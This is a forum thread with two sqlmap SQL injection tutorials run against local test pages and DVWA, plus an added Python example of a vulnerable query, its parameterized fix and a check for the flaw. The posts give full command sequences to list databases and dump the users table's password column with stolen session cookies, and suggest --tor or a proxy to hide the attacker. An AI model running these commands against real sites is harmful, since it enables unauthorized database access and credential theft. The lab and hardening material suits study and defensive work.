SqlMap
Sql Injection Tool part 1
OS: BackBox Linux (version 2.05)
Target : 127.0.0.1
Vulnerable Url : 127.0.0.1/SQLInjection/injection.php?id=1
Commands I use in this tutorial are as follows (you can add --tor to protect your privacy or --proxy ip:port):
sqlmap -u some.com/index.php?id=1 --dbs
sqlmap -u some.com/index.php?id=1 -D <database name> --tables
sqlmap -u some.com/index.php?id=1 -D <database name> -T <table name> --columns
sqlmap -u some.com/index.php?id=1 -D <database name> -T <table name> -C <column name(s)> --dump
Video
http://www.youtube.com/watch?v=BDI0t1gBUMA
SqlMap + Live Http Headers Addon
Sql Injection Tool part 2
OS: BackBox Linux (version 2.05)
Tool add-on: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/dvwa/
I will use cookies from the session to run the SQL injection attack. Commands I use in this tutorial are as follows (you can add --tor to protect your privacy or --proxy ip:port):
sqlmap -u 'target url' --cookie='information from HTTP Headers' --string='Surname' --dbs
sqlmap -u 'target url' --cookie='information from HTTP Headers' --string='Surname' -D dvwa --tables
sqlmap -u 'target url' --cookie='information from HTTP Headers' --string='Surname' -D dvwa -T users --columns
sqlmap -u 'target url' --cookie='information from HTTP Headers' --string='Surname' -D dvwa -T users -C password,user --dump
Video
http://youtu.be/4Dg0ODJBZxM
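Added example, not part of the original posts: why a page like the test targets above gives a tool a usable true/false signal (the 'Surname' text that --string matches on), and how binding the id as a parameter removes it. The table, sample rows and function names are constructed, and SQLite stands in for the MySQL back end of the PHP pages.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data standing in for a DVWA-style users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, first_name TEXT, surname TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")])
    return db


def render(rows):
    """Mimic the page body: the 'Surname' label appears only when a row comes back."""
    return "".join(f"First name: {first} Surname: {last}\n" for first, last in rows)


def page_vulnerable(db, raw_id):
    # 'Before': the request value is pasted into the SQL text, so the
    # database parses whatever follows the number as part of the query.
    query = "SELECT first_name, surname FROM users WHERE id = " + raw_id
    return render(db.execute(query).fetchall())


def page_hardened(db, raw_id):
    # 'After': reject anything that is not a short decimal number, then pass
    # the value as a bound parameter so it can never change the query shape.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return ""
    rows = db.execute("SELECT first_name, surname FROM users WHERE id = ?",
                      (int(raw_id),)).fetchall()
    return render(rows)


def leaks_boolean_signal(page, db):
    """Regression check: does the page content follow a condition appended to id?"""
    true_page = page(db, "1 AND 1=1")
    false_page = page(db, "1 AND 1=2")
    return ("Surname" in true_page) != ("Surname" in false_page)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable page leaks signal:", leaks_boolean_signal(page_vulnerable, db))
    print("hardened page leaks signal:  ", leaks_boolean_signal(page_hardened, db))
```

A check like leaks_boolean_signal can run in a test suite against every handler that takes an id, so a return to string-built queries fails the build.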
+1
Thanks for the demonstration!
ZEROF,
is the link: 127.0.0.1/SQLInjection/injection.php?id=1 still ON?
I did try a few times but no luck.
Tx
Not Found
The requested URL /SQLInjection/injection.php was not found on this server.
Thanks for sharing, ZEROF. Nice vids.. and nice BB desktop aspect.
V3nD3774 :o
Try: ping 127.0.0.1
If the host is reachable but you cannot access that URI, most probably your ISP is tracking you and blocking your connections, and maybe has already provided your data to a cybercrime investigation agency.
In this case a successful solution could be: less /etc/hosts
also sudo ifconfig lo
or if it's not enough try this (http://en.wikipedia.org/wiki/Localhost).
Good luck!
Quote:
ZEROF,
is the link: 127.0.0.1/SQLInjection/injection.php?id=1 still ON?
When you need to find the path for files, use the whereis or find command. Let's say you want to find the injection.php file in your system; you can use from the terminal:
find / -name injection.php
How to use find command:
Cheers !
Sorry ZEROF,
I might have misunderstood your message (likely because I am a nooob..) but I was not looking for how to find a file on my machine... rather, I was asking whether the link 127.0.0.1/SQLInjection/injection.php?id=1 is still a valid link... this is because when I try to reach this link I just get the following message:
Not Found
The requested URL /SQLInjection/injection.php was not found on this server.
Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80
I will not even comment re b4d_bl0ck's post... it is quite hilarious to say the least (...and maybe has already provided your data to a cybercrime investigation agency)...
Tx again,
~V
V3nD3774, sorry for my irony, I didn't want to offend you.
I just wanted to encourage you to read before getting hands on things... and I guess you didn't visit the link I provided you. :)
What I was trying to explain to you is that 127.0.0.1 is nothing more than your PC. If you have no Apache server running on your system listening on port 80, or you have no resource on your server named /SQLInjection/injection.php, you'll never be able to open it. Evidently ZEROF created a vulnerable app with his own hands or downloaded it, and put it on his server, ready to be exploited.
The URL will never be a valid link for you until you do the same and put on your server a page with the same path and name. That's not an internet resource, but a local one, so it makes no sense asking others if it's a valid link or not... ;)
Sorry for having joked in the first reply.
Have fun!
tx b4d_bl0ck, now it is clearer.